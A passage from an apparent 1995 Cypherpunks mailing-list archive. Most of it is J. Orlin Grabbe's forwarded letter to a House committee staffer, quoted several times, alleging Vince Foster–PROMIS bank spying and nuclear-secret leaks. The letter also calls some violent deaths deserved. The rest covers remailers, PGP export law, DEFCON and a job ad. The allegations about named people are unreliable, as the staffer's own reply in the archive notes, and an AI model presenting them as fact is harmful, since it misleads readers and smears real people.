with fringebinges like you, but your stuff keeps coming up
fulla, um, thin air.  Huh?

MacN

On Mon, 24 Jul 1995, Brad Dolan wrote:

> 
> 
> ---------- Forwarded message ----------
> Date: Mon, 24 Jul 1995 23:11:45 -0400 (EDT)
> From: KALLISTE@delphi.com
> Subject: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
>    Allegations Regarding Vince Foster, the NSA, and
> 	 Banking Transaction Spying, Part IX 
> 
> 		  by J. Orlin Grabbe
> 
> 
> July 23, 1995
> 
> Gregory Wierzynski
> Assistant Staff Director
> U.S. House of Representatives
> Committee on Banking and Financial Services
> 2129 Rayburn Building
> Washington, D.C. 20515
> 202-225-7502
> 
> Dear Mr. Wierzynski:
> 
> Thank you for email letter, a copy of which is attached.
> 
> I am not sure why you think my quoting selections from Mr. Jim Norman 
> necessarily implies endorsement or acceptance of them on my part.  I have, 
> of course, quoted many, many selections from Mr. Norman, so perhaps you 
> could be more specific with respect to the ones you are concerned about.
> 
> Perhaps I could be of assistance to your inquiries among the spooks, if 
> only you could describe to me which points you have investigated, and how 
> you have investigated them. I certainly wouldn't want to promote anything 
> that, as you say, "flied in the face of facts."  
> 
> On the other hand, I am greatly concerned about the use by Alltel 
> Information Services (formerly Systematics) of a libel attorney, 
> Charles O. Morgan, in an attempt to intimidate journalists and destroy 
> the First Amendment to the U.S. Constitution.  
> 
> And I am also gravely concerned about the possible leak of U.S. codes 
> and nuclear secrets to a foreign power, which is an issue of *real* 
> national security concern to the U.S.  (Of course you and I both know 
> that "national security" is often used to hide the truth about sell-outs 
> of national security from the American people, by clamping a lid on 
> the discussion or reporting of things that are common knowledge among 
> U.S. military and security agencies, and even common knowledge to the 
> general public of the foreign power to which these secrets have been 
> compromised.)   
> 
> Before reading my email, and your letter, I sent you a copy of "Part VIII:  
> Allegations Regarding Vince Foster, the NSA, and Banking Transactions 
> Spying".  There you will see from the quotes that the theft of U.S. 
> nuclear secrets by Israel is openly discussed in Israeli newspapers, so 
> I am sure that this is not one of the "off-the-wall" issues to which 
> you are referring.  (With respect to that issue, I suggest that you do 
> some investigation in Tel Aviv.)
> 
> With respect to money laundering I am not concerned,  for reasons I have 
> indicated in my essay "The End of Ordinary Money",  Parts I and II,  
> a copy of which I previously provided the Committee.  The money-laundering 
> laws ought to be abolished, but in the meantime I do find the selective 
> enforcement of these laws troubling.
> 
> With respect to "Chuck in Kentucky", I know more than one Chuck in Kentucky,
> so perhaps you could be more specific which Chuck you refer to.  What stories 
> did he tell you, and how is it that they didn't pan out?
> 
> Since you have already spoken to both Jim and Chuck, I am taking the liberty 
> of sending a copy of this letter (and your letter) to Jim Norman, and to one 
> possible Chuck you may be referring to, so that perhaps they can explain to 
> me their failing to satisfy you as to the accuracy of their information.
> 
> Now, Mr. Wierzynski, I would like to bring up an issue about your Committee's 
> behavior that is troubling me.  I am sure that there is an innocent 
> explanation that I am missing. You will recall the meeting that I had with 
> you and Mr. Stephen Ganis, the Counsel to the Committee, at the Four Seasons 
> in Georgetown on Monday, June 12, 1995.  Two days previously I had been 
> playing volleyball in the Mall with Dana Rohrbacher and Jack Wheeler and some 
> others, and I had pulled most of the muscles in my right ankle.  So I 
> asked everyone I was meeting to come over to the hotel, and you and Mr. Ganis 
> graciously consented.  We met in the Four Seasons lounge, where I was the 
> only person not wearing shoes.    
> 
> You told me that, more than money laundering in Mena, Arkansas, you were 
> interested as to whether there were any documents connecting Vince Foster 
> to Systematics, or whether I knew the name of any Systematics programmers 
> that may have worked to modify the PROMIS software to spy on banking 
> transactions.  I told you I couldn't recall seeing any such documents, and 
> that I had come across the name of one programmer, but I had subsequently 
> forgotten it.  It was a pleasant meeting, so to be helpful I gave you a 
> copy of Jim Norman's *Fostergate* that had been spiked from *Forbes*.  
> "Why would Steve Forbes kill the article?" you asked.  I said I didn't 
> know, but that--since you appeared to know Steve Forbes--you should call 
> him yourself.
> 
> Now, much to my surprise, I find that the following happened:  Just as 
> *Media Bypass* was about to run Jim Norman's article *Fostergate*, they 
> received a letter from Charles O. Morgan, indicating grave consequences 
> if they were so foolish as to print the article. Mr. Morgan claimed to know 
> what was in the article, because, he said, he had received a copy from Mr. 
> Stephen Ganis of your Committee!  
> 
> I am bothered by the fact that while you alleged to me you were investigating 
> Systematics that at the same time you are passing along information to 
> Systematics.  I am sure there is an innocent explanation.  But consider this:  
> what if I had given you Foster-related documents and the names of Systematics 
> programmers?  Would these have been passed along to Mr. Morgan also?  As you 
> know, a number of people connected to this whole business have died violent 
> deaths in Arkansas.  (Of course, I understand some of them had already been 
> paid off to keep their mouths shut, and didn't, and so--under any standard of 
> morality--deserved what they got.)  
> 
> Well, things are never what they appear, so perhaps you can clear things up 
> for me. Please pass along my concern to Mr. Ganis, and tell him I will be 
> glad to sit down with him and have a drink, or share a line, and have a frank 
> discussion about this issue. (I have nothing against the use of any drug, if 
> used in moderation, and in the appropriate context.) 
>    
> Regards,
> Orlin
> 
> Attachment:  Your letter to me
> - ---------------------------------------------------------------------
> 
> From:   IN%"gregorw@netcom.com" 23-JUL-1995 19:53:52.82
> To:     IN%"KALLISTE@delphi.com"
> CC:     
> Subj:   RE:  Part VII
> 
> Return-path: <gregorw@netcom.com>
> Received: from netcom13.netcom.com by delphi.com (PMDF V4.3-9 #10880)
>  id <01HT7ZLMQQTC9VUSVZ@delphi.com>; Sun, 23 Jul 1995 19:53:50 -0400 (EDT)
> Received: by netcom13.netcom.com (8.6.12/Netcom) id QAA03469; Sun,
>  23 Jul 1995 16:51:04 -0700
> Date: Sun, 23 Jul 1995 16:51:04 -0700
> From: gregorw@netcom.com (Gregory Wierzynski)
> Subject: Re:  Part VII
> To: KALLISTE@delphi.com
> Message-id: <199507232351.QAA03469@netcom13.netcom.com>
> Content-transfer-encoding: 7BIT
> 
> Orlin --
> 
> We're reading your stuff with interest. Thank you for including me in your 
> list of recipients; I pass the material on to my boss and my colleagues on 
> the Committee.
> 
> I am somewhat surprised, however, that you accept the Norman piece without 
> raising any questions about its sources. We've talked to Jim and tried to 
> check out the sources he thought he could share with us. We have also done 
> a fair amount of investigating on our own using the resources available to 
> us--by which I mean official inquiries to the spooks. So far we draw a 
> complete blank. Worse, the preponderance of the evidence suggests that 
> Jim's piece is pretty much off-the-wall. Worse still, it appears to fly in 
> the face not just of facts, but simple logic as well. 
> 
> I haven't, by any means, given up on this subject, but pursuing a trail 
> grown cold is difficult to justify when you're paid by the taxpayer.
> 
> Do you have suggestions on how we could verify some of the elements in the 
> Norman story? I've talked to Chuck in Kentucky and am still in touch with 
> him. But his stories have not panned out, even partially. I would be most 
> interested in your ideas. 
> 
> Best regards. 
> Greg
> 
> - -
> 
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMBP21mX1Kn9BepeVAQGP3AP9Hm/kwmUuz9kNH+q9D728Xe6rdHHPjpT8
> bAxwzIK9UsJsIF5oLfjTVWovEtGBj3QvJlmFY7hkVFZAYpx6q4R65NUX/ZpHtKaF
> QDugRJZJUxKRaD+9CYepFFt6+ZTK8pQr+me3CgY1ZBVbdNZL4LE9rLFA1Z4XD/vL
> csNGnDpuTq0=
> =t4hx
> -----END PGP SIGNATURE-----
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Veeneman <system@decode.com>
Date: Mon, 24 Jul 95 21:12:36 PDT
To: cypherpunks@toad.com
Subject: Anyone going to DEFCON
Message-ID: <X9ZR9c2w165w@decode.com>
MIME-Version: 1.0
Content-Type: text/plain


QLDM75A@prodigy.com (MR ELDON B JENKINS) writes:

> I don't know if anyone else from this list is going but I will be 
> there for the whole conference and wouldn't mind meeting up with some 
> of the people from this list.

[...]

I am also planning on attending DefCon, and would be interested in meeting
up with some Cypherpunks.

> Eldon Jenkins

Dan


--
system@decode.com (Dan Veeneman)
Cryptography, Security, Privacy BBS  +1 410 730 6734   Data/FAX




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 24 Jul 95 20:55:27 PDT
To: cypherpunks@toad.com
Subject: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying (fwd)
Message-ID: <Pine.SOL.3.91.950724234854.130D-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Mon, 24 Jul 1995 23:11:45 -0400 (EDT)
From: KALLISTE@delphi.com
Subject: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying

-----BEGIN PGP SIGNED MESSAGE-----

   Allegations Regarding Vince Foster, the NSA, and
	 Banking Transaction Spying, Part IX 

		  by J. Orlin Grabbe


July 23, 1995

Gregory Wierzynski
Assistant Staff Director
U.S. House of Representatives
Committee on Banking and Financial Services
2129 Rayburn Building
Washington, D.C. 20515
202-225-7502

Dear Mr. Wierzynski:

Thank you for email letter, a copy of which is attached.

I am not sure why you think my quoting selections from Mr. Jim Norman 
necessarily implies endorsement or acceptance of them on my part.  I have, 
of course, quoted many, many selections from Mr. Norman, so perhaps you 
could be more specific with respect to the ones you are concerned about.

Perhaps I could be of assistance to your inquiries among the spooks, if 
only you could describe to me which points you have investigated, and how 
you have investigated them. I certainly wouldn't want to promote anything 
that, as you say, "flied in the face of facts."  

On the other hand, I am greatly concerned about the use by Alltel 
Information Services (formerly Systematics) of a libel attorney, 
Charles O. Morgan, in an attempt to intimidate journalists and destroy 
the First Amendment to the U.S. Constitution.  

And I am also gravely concerned about the possible leak of U.S. codes 
and nuclear secrets to a foreign power, which is an issue of *real* 
national security concern to the U.S.  (Of course you and I both know 
that "national security" is often used to hide the truth about sell-outs 
of national security from the American people, by clamping a lid on 
the discussion or reporting of things that are common knowledge among 
U.S. military and security agencies, and even common knowledge to the 
general public of the foreign power to which these secrets have been 
compromised.)   

Before reading my email, and your letter, I sent you a copy of "Part VIII:  
Allegations Regarding Vince Foster, the NSA, and Banking Transactions 
Spying".  There you will see from the quotes that the theft of U.S. 
nuclear secrets by Israel is openly discussed in Israeli newspapers, so 
I am sure that this is not one of the "off-the-wall" issues to which 
you are referring.  (With respect to that issue, I suggest that you do 
some investigation in Tel Aviv.)

With respect to money laundering I am not concerned,  for reasons I have 
indicated in my essay "The End of Ordinary Money",  Parts I and II,  
a copy of which I previously provided the Committee.  The money-laundering 
laws ought to be abolished, but in the meantime I do find the selective 
enforcement of these laws troubling.

With respect to "Chuck in Kentucky", I know more than one Chuck in Kentucky,
so perhaps you could be more specific which Chuck you refer to.  What stories 
did he tell you, and how is it that they didn't pan out?

Since you have already spoken to both Jim and Chuck, I am taking the liberty 
of sending a copy of this letter (and your letter) to Jim Norman, and to one 
possible Chuck you may be referring to, so that perhaps they can explain to 
me their failing to satisfy you as to the accuracy of their information.

Now, Mr. Wierzynski, I would like to bring up an issue about your Committee's 
behavior that is troubling me.  I am sure that there is an innocent 
explanation that I am missing. You will recall the meeting that I had with 
you and Mr. Stephen Ganis, the Counsel to the Committee, at the Four Seasons 
in Georgetown on Monday, June 12, 1995.  Two days previously I had been 
playing volleyball in the Mall with Dana Rohrbacher and Jack Wheeler and some 
others, and I had pulled most of the muscles in my right ankle.  So I 
asked everyone I was meeting to come over to the hotel, and you and Mr. Ganis 
graciously consented.  We met in the Four Seasons lounge, where I was the 
only person not wearing shoes.    

You told me that, more than money laundering in Mena, Arkansas, you were 
interested as to whether there were any documents connecting Vince Foster 
to Systematics, or whether I knew the name of any Systematics programmers 
that may have worked to modify the PROMIS software to spy on banking 
transactions.  I told you I couldn't recall seeing any such documents, and 
that I had come across the name of one programmer, but I had subsequently 
forgotten it.  It was a pleasant meeting, so to be helpful I gave you a 
copy of Jim Norman's *Fostergate* that had been spiked from *Forbes*.  
"Why would Steve Forbes kill the article?" you asked.  I said I didn't 
know, but that--since you appeared to know Steve Forbes--you should call 
him yourself.

Now, much to my surprise, I find that the following happened:  Just as 
*Media Bypass* was about to run Jim Norman's article *Fostergate*, they 
received a letter from Charles O. Morgan, indicating grave consequences 
if they were so foolish as to print the article. Mr. Morgan claimed to know 
what was in the article, because, he said, he had received a copy from Mr. 
Stephen Ganis of your Committee!  

I am bothered by the fact that while you alleged to me you were investigating 
Systematics that at the same time you are passing along information to 
Systematics.  I am sure there is an innocent explanation.  But consider this:  
what if I had given you Foster-related documents and the names of Systematics 
programmers?  Would these have been passed along to Mr. Morgan also?  As you 
know, a number of people connected to this whole business have died violent 
deaths in Arkansas.  (Of course, I understand some of them had already been 
paid off to keep their mouths shut, and didn't, and so--under any standard of 
morality--deserved what they got.)  

Well, things are never what they appear, so perhaps you can clear things up 
for me. Please pass along my concern to Mr. Ganis, and tell him I will be 
glad to sit down with him and have a drink, or share a line, and have a frank 
discussion about this issue. (I have nothing against the use of any drug, if 
used in moderation, and in the appropriate context.) 
   
Regards,
Orlin

Attachment:  Your letter to me
- ---------------------------------------------------------------------

From:   IN%"gregorw@netcom.com" 23-JUL-1995 19:53:52.82
To:     IN%"KALLISTE@delphi.com"
CC:     
Subj:   RE:  Part VII

Return-path: <gregorw@netcom.com>
Received: from netcom13.netcom.com by delphi.com (PMDF V4.3-9 #10880)
 id <01HT7ZLMQQTC9VUSVZ@delphi.com>; Sun, 23 Jul 1995 19:53:50 -0400 (EDT)
Received: by netcom13.netcom.com (8.6.12/Netcom) id QAA03469; Sun,
 23 Jul 1995 16:51:04 -0700
Date: Sun, 23 Jul 1995 16:51:04 -0700
From: gregorw@netcom.com (Gregory Wierzynski)
Subject: Re:  Part VII
To: KALLISTE@delphi.com
Message-id: <199507232351.QAA03469@netcom13.netcom.com>
Content-transfer-encoding: 7BIT

Orlin --

We're reading your stuff with interest. Thank you for including me in your 
list of recipients; I pass the material on to my boss and my colleagues on 
the Committee.

I am somewhat surprised, however, that you accept the Norman piece without 
raising any questions about its sources. We've talked to Jim and tried to 
check out the sources he thought he could share with us. We have also done 
a fair amount of investigating on our own using the resources available to 
us--by which I mean official inquiries to the spooks. So far we draw a 
complete blank. Worse, the preponderance of the evidence suggests that 
Jim's piece is pretty much off-the-wall. Worse still, it appears to fly in 
the face not just of facts, but simple logic as well. 

I haven't, by any means, given up on this subject, but pursuing a trail 
grown cold is difficult to justify when you're paid by the taxpayer.

Do you have suggestions on how we could verify some of the elements in the 
Norman story? I've talked to Chuck in Kentucky and am still in touch with 
him. But his stories have not panned out, even partially. I would be most 
interested in your ideas. 

Best regards. 
Greg

- -



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Tue, 25 Jul 95 00:29:18 PDT
To: cypherpunks@toad.com
Subject: Re: Mixmaster for DOS Yet?
Message-ID: <ac3a497c050210046825@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:16 PM 7/22/95, bluebird@alpha.c2.org wrote:
>[Please reply via netmail or Cc: - I have only periodic access to list.]
>
>Is the Mixmaster user software for DOS platforms completed yet?
>
>Thanks for any help.

Not yet. It should be out shortly after the next Mixmaster release.
I will make a lot of noise when I release the DOS code. You will not miss it.

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 24 Jul 95 21:58:22 PDT
To: cypherpunks@toad.com
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
Message-ID: <199507250455.AAA13908@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <m0saTpk-0005BTC@nrk.com>, wb8foz@nrk.com (David Lesher) wrote:

>marc:
>> However, goods of U.S. origin are export restricted, unless said
>> goods are further processed outside the U.S. so as to result in a
>> substantial change in value, so some of the PGP development would
>> need to be done in Canada.
>
>How about compiling it? THAT is "further processing"......

I am not sure that would hold. After all, the disk with the source code to
"Applied Cryptography" was denied an export license, because the source
code could be compiled into libraries.
<What kind of drugs are these people on anyway? They really ought to quit.>

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMBR5PCoZzwIn1bdtAQGSygGAs0JN64qoFfzC0OEL+yV5p/iWecnTtBeJ
Fm8a7jsIqtV+FsQg7ATQRcpSxtDOnbS2
=He6y
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Mon, 24 Jul 95 23:10:45 PDT
To: cypherpunks@toad.com
Subject: Re: Crisis Overload (re Electronic Racketeering)
Message-ID: <199507250610.XAA28570@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I am a candidate for the 
Minneapolis City Council, 4th ward.
As a registered Independent.

Now if I can get a campaign donation
to give every resident a copy of PGP,
then I've got it made.

I did run for Parks Commission in '79.
7,000 votes with no money.

Love Always,

Carol Anne


>Direct mail is useful.  But until you've worked to get someone elected, 
>you are just one more voice in the roar.  The '96 campaigns are shaping 
>up.  (I'm already putting the word out for '98...)  This is the time to 
>find people who share our views, and work so that they win their 
>primaries--or maybe don't even have to fight one.  Or maybe it's time 
>_you_ ran.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

--

Member Internet Society  -  Certified BETSI Programmer  -   Webmistress
*************************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
carolann@c2.org - carolb@spring.com - carolab@primenet.com
*************************************************************************
My Homepage
The Cyberdoc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 24 Jul 95 22:13:29 PDT
To: Mac Norton <mnorton@cavern.uark.edu>
Subject: Re: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying (fwd)
In-Reply-To: <Pine.SOL.3.91.950724232244.24512K-100000@cavern>
Message-ID: <Pine.SOL.3.91.950725010535.9324A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


I found Grabbe's essay sufficiently interesting to forward, but all I
did was forward it.  If you have questions, you will do better to 
address them to: kalliste@delphi.com

bd

On Mon, 24 Jul 1995, Mac Norton wrote:

> Okay, thing is, I read all of the below, and it seems like 
> the guy's trying hard to tell you that he'd bend over 
> backward to make this case, even to the extent of associating
> with fringebinges like you, but your stuff keeps coming up
> fulla, um, thin air.  Huh?
> 
> MacN
> 
> On Mon, 24 Jul 1995, Brad Dolan wrote:
> 
> > 
> > 
> > ---------- Forwarded message ----------
> > Date: Mon, 24 Jul 1995 23:11:45 -0400 (EDT)
> > From: KALLISTE@delphi.com
> > Subject: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying
> > 
> > -----BEGIN PGP SIGNED MESSAGE-----
> > 
> >    Allegations Regarding Vince Foster, the NSA, and
> > 	 Banking Transaction Spying, Part IX 
> > 
> > 		  by J. Orlin Grabbe
> > 
> > 
> > July 23, 1995
> > 
> > Gregory Wierzynski
> > Assistant Staff Director
> > U.S. House of Representatives
> > Committee on Banking and Financial Services
> > 2129 Rayburn Building
> > Washington, D.C. 20515
> > 202-225-7502
> > 
> > Dear Mr. Wierzynski:
> > 
> > Thank you for your email letter, a copy of which is attached.
> > 
> > I am not sure why you think my quoting selections from Mr. Jim Norman 
> > necessarily implies endorsement or acceptance of them on my part.  I have, 
> > of course, quoted many, many selections from Mr. Norman, so perhaps you 
> > could be more specific with respect to the ones you are concerned about.
> > 
> > Perhaps I could be of assistance to your inquiries among the spooks, if 
> > only you could describe to me which points you have investigated, and how 
> > you have investigated them. I certainly wouldn't want to promote anything 
> > that, as you say, "flied in the face of facts."  
> > 
> > On the other hand, I am greatly concerned about the use by Alltel 
> > Information Services (formerly Systematics) of a libel attorney, 
> > Charles O. Morgan, in an attempt to intimidate journalists and destroy 
> > the First Amendment to the U.S. Constitution.  
> > 
> > And I am also gravely concerned about the possible leak of U.S. codes 
> > and nuclear secrets to a foreign power, which is an issue of *real* 
> > national security concern to the U.S.  (Of course you and I both know 
> > that "national security" is often used to hide the truth about sell-outs 
> > of national security from the American people, by clamping a lid on 
> > the discussion or reporting of things that are common knowledge among 
> > U.S. military and security agencies, and even common knowledge to the 
> > general public of the foreign power to which these secrets have been 
> > compromised.)   
> > 
> > Before reading my email, and your letter, I sent you a copy of "Part VIII:  
> > Allegations Regarding Vince Foster, the NSA, and Banking Transactions 
> > Spying".  There you will see from the quotes that the theft of U.S. 
> > nuclear secrets by Israel is openly discussed in Israeli newspapers, so 
> > I am sure that this is not one of the "off-the-wall" issues to which 
> > you are referring.  (With respect to that issue, I suggest that you do 
> > some investigation in Tel Aviv.)
> > 
> > With respect to money laundering I am not concerned,  for reasons I have 
> > indicated in my essay "The End of Ordinary Money",  Parts I and II,  
> > a copy of which I previously provided the Committee.  The money-laundering 
> > laws ought to be abolished, but in the meantime I do find the selective 
> > enforcement of these laws troubling.
> > 
> > With respect to "Chuck in Kentucky", I know more than one Chuck in Kentucky,
> > so perhaps you could be more specific which Chuck you refer to.  What stories 
> > did he tell you, and how is it that they didn't pan out?
> > 
> > Since you have already spoken to both Jim and Chuck, I am taking the liberty 
> > of sending a copy of this letter (and your letter) to Jim Norman, and to one 
> > possible Chuck you may be referring to, so that perhaps they can explain to 
> > me their failing to satisfy you as to the accuracy of their information.
> > 
> > Now, Mr. Wierzynski, I would like to bring up an issue about your Committee's 
> > behavior that is troubling me.  I am sure that there is an innocent 
> > explanation that I am missing. You will recall the meeting that I had with 
> > you and Mr. Stephen Ganis, the Counsel to the Committee, at the Four Seasons 
> > in Georgetown on Monday, June 12, 1995.  Two days previously I had been 
> > playing volleyball in the Mall with Dana Rohrbacher and Jack Wheeler and some 
> > others, and I had pulled most of the muscles in my right ankle.  So I 
> > asked everyone I was meeting to come over to the hotel, and you and Mr. Ganis 
> > graciously consented.  We met in the Four Seasons lounge, where I was the 
> > only person not wearing shoes.    
> > 
> > You told me that, more than money laundering in Mena, Arkansas, you were 
> > interested as to whether there were any documents connecting Vince Foster 
> > to Systematics, or whether I knew the name of any Systematics programmers 
> > that may have worked to modify the PROMIS software to spy on banking 
> > transactions.  I told you I couldn't recall seeing any such documents, and 
> > that I had come across the name of one programmer, but I had subsequently 
> > forgotten it.  It was a pleasant meeting, so to be helpful I gave you a 
> > copy of Jim Norman's *Fostergate* that had been spiked from *Forbes*.  
> > "Why would Steve Forbes kill the article?" you asked.  I said I didn't 
> > know, but that--since you appeared to know Steve Forbes--you should call 
> > him yourself.
> > 
> > Now, much to my surprise, I find that the following happened:  Just as 
> > *Media Bypass* was about to run Jim Norman's article *Fostergate*, they 
> > received a letter from Charles O. Morgan, indicating grave consequences 
> > if they were so foolish as to print the article. Mr. Morgan claimed to know 
> > what was in the article, because, he said, he had received a copy from Mr. 
> > Stephen Ganis of your Committee!  
> > 
> > I am bothered by the fact that while you alleged to me you were investigating 
> > Systematics that at the same time you are passing along information to 
> > Systematics.  I am sure there is an innocent explanation.  But consider this:  
> > what if I had given you Foster-related documents and the names of Systematics 
> > programmers?  Would these have been passed along to Mr. Morgan also?  As you 
> > know, a number of people connected to this whole business have died violent 
> > deaths in Arkansas.  (Of course, I understand some of them had already been 
> > paid off to keep their mouths shut, and didn't, and so--under any standard of 
> > morality--deserved what they got.)  
> > 
> > Well, things are never what they appear, so perhaps you can clear things up 
> > for me. Please pass along my concern to Mr. Ganis, and tell him I will be 
> > glad to sit down with him and have a drink, or share a line, and have a frank 
> > discussion about this issue. (I have nothing against the use of any drug, if 
> > used in moderation, and in the appropriate context.) 
> >    
> > Regards,
> > Orlin
> > 
> > Attachment:  Your letter to me
> > - ---------------------------------------------------------------------
> > 
> > From:   IN%"gregorw@netcom.com" 23-JUL-1995 19:53:52.82
> > To:     IN%"KALLISTE@delphi.com"
> > CC:     
> > Subj:   RE:  Part VII
> > 
> > Return-path: <gregorw@netcom.com>
> > Received: from netcom13.netcom.com by delphi.com (PMDF V4.3-9 #10880)
> >  id <01HT7ZLMQQTC9VUSVZ@delphi.com>; Sun, 23 Jul 1995 19:53:50 -0400 (EDT)
> > Received: by netcom13.netcom.com (8.6.12/Netcom) id QAA03469; Sun,
> >  23 Jul 1995 16:51:04 -0700
> > Date: Sun, 23 Jul 1995 16:51:04 -0700
> > From: gregorw@netcom.com (Gregory Wierzynski)
> > Subject: Re:  Part VII
> > To: KALLISTE@delphi.com
> > Message-id: <199507232351.QAA03469@netcom13.netcom.com>
> > Content-transfer-encoding: 7BIT
> > 
> > Orlin --
> > 
> > We're reading your stuff with interest. Thank you for including me in your 
> > list of recipients; I pass the material on to my boss and my colleagues on 
> > the Committee.
> > 
> > I am somewhat surprised, however, that you accept the Norman piece without 
> > raising any questions about its sources. We've talked to Jim and tried to 
> > check out the sources he thought he could share with us. We have also done 
> > a fair amount of investigating on our own using the resources available to 
> > us--by which I mean official inquiries to the spooks. So far we draw a 
> > complete blank. Worse, the preponderance of the evidence suggests that 
> > Jim's piece is pretty much off-the-wall. Worse still, it appears to fly in 
> > the face not just of facts, but simple logic as well. 
> > 
> > I haven't, by any means, given up on this subject, but pursuing a trail 
> > grown cold is difficult to justify when you're paid by the taxpayer.
> > 
> > Do you have suggestions on how we could verify some of the elements in the 
> > Norman story? I've talked to Chuck in Kentucky and am still in touch with 
> > him. But his stories have not panned out, even partially. I would be most 
> > interested in your ideas. 
> > 
> > Best regards. 
> > Greg
> > 
> > - -
> > 
> > 
> > 
> > -----BEGIN PGP SIGNATURE-----
> > Version: 2.6.2
> > 
> > -----END PGP SIGNATURE-----
> > 
> > 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Mon, 24 Jul 95 16:19:10 PDT
To: cypherpunks@toad.com
Subject: Re: An idea about Java and remailer clients and servers...
Message-ID: <199507242313.BAA27191@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Phil Fraering writes:
>  Why not "charge" for the ability to send an anonymous message with
>  the duty to have for a short time (maybe an hour or two) running
>  on your machine a node in a remailer network?

User X on Machine A sends a form via HTTP (or a variant- SHTTP, HTTPS, etc.)
to Machine B.  User Y on Machine C receives an anonymous mail from Machine
B.  Suspecting User X, User Y sends a mail to be anonymized and sent back to
himself to User X.  User X's temporary remailer does as it's told.  User Y
now has a strong reason to suspect User X has sent the said mail.

Cpunks write code and all, but I don't think this one's going to work. :-(






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jed@blaze.cs.jhu.edu (Jeremy Rauch)
Date: Mon, 24 Jul 95 19:00:07 PDT
To: cypherpunks@toad.com
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
In-Reply-To: <m0saTpk-0005BTC@nrk.com>
Message-ID: <3v1j6h$fge@blaze.cs.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


David Lesher (wb8foz@nrk.com) wrote:


: marc:
: > However, goods of U.S. origin are export restricted, unless said
: > goods are further processed outside the U.S. so as to result in a
: > substantial change in value, so some of the PGP development would
: > need to be done in Canada.

: How about compiling it? THAT is "further processing"......

Perhaps...but I for one wouldn't trust anyone else to compile my copy
of PGP...would you?
And, note, it says substantial change in value...I don't know if this is taken
to mean monetary, or usability...the latter might work.  
It's an interesting idea.
Jeremy


: -- 
: A host is a host from coast to coast.................wb8foz@nrk.com
: & no one will talk to a host that's close........[v].(301) 56-LINUX
: Unless the host (that isn't close).........................pob 1433
: is busy, hung or dead....................................20915-1433

--
 ____________________________________________________________________________
| Jeremy Rauch              .--~~,__   |                                     |
|              :-....,-------`~~'._.'  |         jed@cs.jhu.edu              |
|               `-,,,  ,_      ;'~U'   |    alhambra@jhu.edu                 |
| Johns Hopkins  _,-' ,'`-__; '--.     |         jed@jhunix.hcf.jhu.edu      |
|   University  (_/'~~      ''''(;     |     http://server.cs.jhu.edu/~jed   |
|______________________________________|_____________________________________|
Finger for PGP key
				Member, *the Guild

          The light that burns twice as bright burns half as long




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Tue, 25 Jul 95 02:14:45 PDT
To: cypherpunks@toad.com
Subject: (fwd) INTERNET APPLICATIONS ENGINEER/CommerceNet
Message-ID: <199507250912.CAA02676@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


    Found this during my job search.  Lacking the skills myself,
    thought perhaps someone else on the list might be interested.
    --------------------------------------------------------------

Enterprise Integration Technologies (EIT) is a recognized pioneer in the
development of software and services for electronic commerce on the
Internet.  EIT has played significant management roles in Terisa Systems,
a company that develops, markets, licenses, and supports technologies that
make secure Internet transactions possible and CommerceNet Consortium,
which  facilitates the use of an Internet-based infrastructure for
electronic commerce to allow efficient interactions among customers,
suppliers and development partners.  Additionally, EIT was integrally
involved in the development of WebSite, a product of O'Reilly &
Associates, Inc.

The following position is currently available:


INTERNET APPLICATIONS ENGINEER/CommerceNet
REQ #103


As a CommerceNet development team member you will be responsible for
developing Internet-based security-enabled electronic commerce
applications.  

The focus will be integrating secure peer-to-peer messaging technologies,
